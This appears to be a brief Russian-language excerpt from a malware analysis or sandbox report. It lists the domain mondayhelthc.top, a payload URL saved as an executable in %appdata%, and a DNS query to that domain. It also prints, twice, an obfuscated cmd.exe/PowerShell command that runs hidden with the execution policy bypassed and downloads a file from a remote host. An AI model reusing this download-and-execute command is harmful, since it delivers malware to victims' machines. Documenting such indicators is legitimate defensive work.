Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wEr^sHEl^l^.^ExE -ExECU^t^I^O^NpOl^IC^y Byp^asS^ ^-n^O^P^Ro^FI^Le -^WindOw^STYLE ^HIdden ^(n^EW-^obJeC^t^ ^SY^stEM.^n^et^.wEB^c^lie^nt).^d^owNLOaD^FIL^E^(^'http://...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^wEr^sHEl^l^.^ExE -ExECU^t^I^O^NpOl^IC^y Byp^asS^ ^-n^O^P^Ro^FI^Le -^WindOw^STYLE ^HIdden ^(n^EW-^obJeC^t^ ^SY^stEM.^n^et^.wEB^c^lie^nt).^d^owNLOaD^FIL^E^(^'http://...' (со скрытым окном)